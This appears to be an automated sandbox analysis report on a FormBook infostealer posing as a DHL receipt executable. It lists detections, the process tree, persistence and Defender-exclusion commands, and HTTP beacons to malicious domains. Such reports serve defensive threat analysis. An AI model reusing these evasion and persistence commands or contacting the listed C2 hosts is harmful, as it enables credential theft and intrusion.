Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name:DHL AWB Receipt_pdf.bat.exe
Analysis ID:1627806
MD5:3223bedb21ba57b91733676031df958a
SHA1:25cfec6a2b4e9c1cc51fcf343bbef54fcef8c3b9
SHA256:84c2a2d742fbccab3644af070d779ef71e8f377a6ab8d1a83127d2605622f105
Tags:batDHLexeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DHL AWB Receipt_pdf.bat.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 3223BEDB21BA57B91733676031DF958A)
    • powershell.exe (PID: 2860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2436 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 3536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 1972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • ctd5Fl0jEEYLVK.exe (PID: 4500 cmdline: "C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 7436 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • ctd5Fl0jEEYLVK.exe (PID: 1252 cmdline: "C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\cvLwNUeE0ZCpMF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • oSJLRdDbLeQ.exe (PID: 5592 cmdline: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe MD5: 3223BEDB21BA57B91733676031DF958A)
    • schtasks.exe (PID: 7376 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe, ParentImage: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe, ParentProcessId: 5592, ParentProcessName: oSJLRdDbLeQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", ProcessId: 7376, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", ProcessId: 2436, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", ProcessId: 2436, ProcessName: schtasks.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.quo1ybjmkhdqljoz.top/19my/Avira URL Cloud: Label: malware
                Source: http://www.quo1ybjmkhdqljoz.top/19my/?-n=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&ahd=WXQDI8Avira URL Cloud: Label: malware
                Source: http://www.publicblockchain.xyz/lp5v/?ahd=WXQDI8&-n=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA==Avira URL Cloud: Label: malware
                Source: http://www.publicblockchain.xyz/lp5v/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeReversingLabs: Detection: 50%
                Multi AV Scanner detection for submitted file
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 50%
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 45%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4686746546.000000000045F000.00000002.00000001.01000000.0000000D.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4686554692.000000000045F000.00000002.00000001.01000000.0000000D.sdmp

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031233435.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.multo.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 23.29.115.2 23.29.115.2
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /wuv4/?ahd=WXQDI8&-n=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCRNuXwDr216DBxJqwrztqafm0gN7GWo7wazhUvMW/D9sNzA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loonerverse.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /esw3/?-n=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjTWldf3EKfrFwCElolvucyT5INFTCRjeylmDK6mihpn7uUQ==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /frae/?-n=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kku1OzbK5yiK6noV5aH1cMop/1tMHAh9Rfx/ZornT1cvdxLg==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031233435.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /19my/?-n=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.quo1ybjmkhdqljoz.topUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lp5v/?ahd=WXQDI8&-n=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.publicblockchain.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /piuf/?-n=YCNZp8d5iXit/W0AorWaWt7d4xAAmtdp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURu2gkZni0KV25495YYQVjjOAmXfWkpHxpYmfFMe+ykUCf6A==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.multo.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ty1w/?-n=DmU+BbsPdbeZ2oth7eqVH4IxkOLk6Zp/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DKB7uL0+Vw2px/OOdkCjvCA4RBa4gXyq2/Cl2LwjArqGdZw==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tkloqr.infoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /acnz/?-n=4AOqIRL3pTX0nNGi+lOPSRSyx/iWc+VNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmlygepuDbgjx8TrlAGHAV/0a3Ooi8Z9K5OsEAJsLCu/irBQ==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.streaay.liveUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qnz1/?-n=R+Oteo3rh3f7nhB2gSiRNKBizK43zE0qallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvUuxTTHBcMTuCJqSn7igyXIXCBr+LpjPOdBGcjRnmk/kZJw==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.77zhibo.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /bio5/?-n=7nMcQ+p/VAEQ2azQobfLLk4wRClPro4nkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH6uuiHc4YC+tLjkWWBGbbvYq75oa+pjtqeeHcG0lj96z8LA==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thefounder.ceoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2dxw/?-n=53Ecfr8B68ed/Blg+8N/NSWf2AxVSX5XzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDzdYfw3xDcQr8Se8sECh3iguJ/J/JYFBf2UKrXqcOWenkdA==&ahd=WXQDI8 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rbopisalive.cyouUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.loonerverse.app
                Source: global trafficDNS traffic detected: DNS query: www.primepath.net
                Source: global trafficDNS traffic detected: DNS query: www.031233435.xyz
                Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                Source: global trafficDNS traffic detected: DNS query: www.publicblockchain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.multo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tkloqr.info
